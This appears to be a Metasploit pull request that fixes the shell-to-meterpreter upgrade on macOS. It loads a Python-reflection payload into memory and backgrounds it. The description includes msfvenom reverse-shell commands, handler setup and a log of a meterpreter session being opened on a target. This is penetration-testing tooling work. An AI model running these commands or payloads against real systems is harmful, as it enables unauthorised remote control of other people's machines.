### PR TITLE
Fix #14620, fix multi/manage/shell_to_meterpreter on macOS

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -181,7 +181,7 @@ class MetasploitModule < Msf::Post
     when 'osx'
       vprint_status("Transfer method: Python [OSX]")
       payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload_data, {})
-      cmd_exec("echo \"#{payload_data}\" | python")
+      cmd_exec("echo \"#{payload_data}\" | python & disown")
     else
       vprint_status("Transfer method: Bourne shell [fallback]")
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -178,6 +178,10 @@ class MetasploitModule < Msf::Post
     when 'python'
       vprint_status("Transfer method: Python")
       cmd_exec("echo \"#{payload_data}\" | python")
+    when 'osx'
+      vprint_status("Transfer method: Python [OSX]")
+      payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload_data, {})
+      cmd_exec("echo \"#{payload_data}\" | python")
     else
       vprint_status("Transfer method: Bourne shell [fallback]")
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)


### PR DESCRIPTION
resolves https://github.com/rapid7/metasploit-framework/issues/14620

This change fixes and improves `sessions -u #` on macOS.
By using python reflection we can upgrade a shell session on macOS to a meterpreter session, in memory, without dropping a file to disk.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Start a generic shell listener:
```
use exploit/multi/handler
set LHOST (your ip)
set ExitOnSession false
run -j
```
- [ ] Get a shell on macOS, `msfvenom -p osx/x64/shell_reverse_tcp LHOST=(msf ip) LPORT=4444 -f macho -o met && chmod +x met && ./met` (or netcat)
- [ ] Upgrade the session `msf6 exploit(multi/handler) > sessions -u 1`
- [ ] **Verify** you get a meterpreter session

Example run:
```
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.13.37:4433
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (799908 bytes) to 192.168.13.38
[*] Meterpreter session 2 opened (192.168.13.37:4433 -> 192.168.13.38:50921) at 2021-02-11 12:11:23 +0000
```